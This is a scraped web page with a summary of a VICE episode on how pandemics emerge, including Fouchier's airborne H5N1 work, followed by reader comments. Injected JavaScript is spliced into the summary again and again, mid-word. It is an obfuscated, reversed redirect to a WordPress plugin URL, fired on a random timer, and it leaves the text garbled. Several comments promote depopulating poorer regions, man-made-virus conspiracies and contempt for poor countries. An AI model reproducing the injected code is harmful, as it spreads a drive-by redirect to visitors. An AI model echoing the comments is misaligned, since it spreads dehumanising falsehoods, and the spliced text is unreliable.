How The World’s Deadliest Pandemics Are Born: VICE on HBO, Full Episode
Somewhere in the world, an unknown virus is growing in the bloodstream of an animal, just waiting toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jump toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the human population.
Since the 1980s, outbreaks of infectious diseases have more than tripled worldwide. For example, one million people die each year from mosquitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-borne illness. To stay ahead of a potentially devastating global pandemic, scientists have come up with new ways toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to research and learn about diseases.
Ron Fouchier, a physician who studies genetic mutations at the Erasmus Medical Center in the Netherlands, genetically modified the H5N1 bird flu virus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to become airborne. “So now we can find out exactly what it takes for an animal virus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to become airborne,” he toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}told VICE News.
Fouchier’s work originally sent shockwaves through the international community, but global health experts have found that diligent surveillance and research of these diseases is the key toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to keeping them at bay.

That was scary but fascinating
Thanks to all the scientists for all their hard work in protecting the human population
Nice video
This was an informative video.
Thank you for your daring work Vice.
If there's another outbreak, just call Finka and Lion

You know what, truth has been gone from this country's government for many many years. It didn't just start now with Trump and I am sick of seeing things about how now this country is this or that and truth is that it has been fucked up for years so people need to actually use their brains and quit.
That was an awesome episode!!
I'm happy to see the collapse of both VICE and Facebook.
Thumbs down; for the fact that you made the various airborne , what's the security like ; supposed some lab worker stole some to use or sell to terrorist?
Nature fights back !
we trying to play god. gg humans
Ok, so exotic virus's hangout in jungle, better kill al fauna and flora in jungles then am i right?
I thought the title said “this is how the world’s most dangerous paramedics are born” I was like what??
Hope they find a cure for the Knuckles disease.
"what we did in the lab is nothing different than what is happening and animals around the globe everyday".. The big difference is humans could intentionally weaponize viruses against different groups of people… And if anyone doesn't believe that most Industrial countries do not have Secret weaponized germ/ virus you are sadly mistaken…
Have we considered just thinning out the population in poorer areas? I mean it sounds like they re a threat to us…
I remember I my country (Ireland), when the swine flu happened my cousin's friend was the first girl in Ireland to die. 🙁
you do not know the way
we need these diseases to proliferate so we can keep 3rd world populations down, they already have a birth ratio of 8+
How about we just annihilate the forest? No more mosquitoes, no more wild life and no more new viruses.
Hi
Overpopulation of the human species is the main problem in all this.
Vice journalists seem like such douches
1947 ??!?!?!
Motorcyce lab service ? Count me in !
hero's are in every corner of the planet thank you VICE!
Hurry up, viruses. Humanity is intolerable.
Right wingers: This is a waste of money. I am not sick right now.
Votes for Trump and Co who shuts it down, but then the right winger gets sick.
Right wingers dying words: Darn you, Obama!
Does anybody know why they add a shading filter over the whites?
Compare the laboratory white to the youtube websites white. Is it a cable TV thing or?
Depopulation goal of NWO by 2050? 50% of the population of Africa and Asia gone.
90% population reduction (globally) on all 5 continents by 2100 .
The scientists are the terrorists…..CRISPR is a prime example.
Be ready.
Viruses created and introduced by Europeans…but successfully misinformed the world of viral origins… This all started after the 2nd world war when biological weapons was being used and also seriously considered between Nazis and the west. But now being used as population control…"The Truth will set you free but first it will piss you off"
Another reason to go vegan. Many of the deadliest infectious diseases have mutated from animal disease since animal agriculture began about 10 000 years ago. Seems like the same process is still going on.
I really thought it said “ how the worlds deadliest paramedics are born”
Bet you won't find any PETA protests at those bird markets
Alina is fat
Bullshit
Why don't you guys tell me what's your problem?
Now get this: thanks to Trump and his idiot lackeys with their anti-science propaganda the chance of not catching the next big outbreak and responding to it is increasing exponentially day by day.
How about the people in Zika and elsewhere just act like civilized people? Isn't it about time? How hard is it to keep a clean working area when working with food and animals. Clean the cages, clean the area around, clean the tables… and maintain some basic common sense hygiene. It's not difficult. These people act like there's no way around it? Why do we need to be ready for viruses just because shitholes are unwilling to clean up after themselves? Ridiculous.
This is what I subscribed to Vice for
I believe these “diseases” are man made. The Native Americans did not have to deal with Ebola, SARS, etc. they dealt with smallpox because of the settlers. I don’t believe in this crap coming from animals.
Africa is like Vice Bread & Butter , throw a dart at the map , pick a problem & shoot the film
Love it when the co-founder himself reporting for his own company! You can see the love and courage right there!
This is what I trained for in school. But alas my knowledge had no value.
0:45 sounds like a bit out of a movie. So dramatic but its not lol
Great video. This is the VICE News that I like to see!
It may be that the developed world is looking to the jungles of African countries for evolving viral threats, but that is where they exist. Selfish motives and subjective opinions aside, a strategy that involves taking a fight to an enemy that is <1400 manometers long by 20-400 nm in diameter is no easy feat. They wait to conquer the world and that is where the battle must be fought and won. For all it's faults, the destiny of all humankind depends on it.
Viruses exist in the jungles of the world waiting for a transmission host to destroy all creation. We can defeat it out it will defeat is.
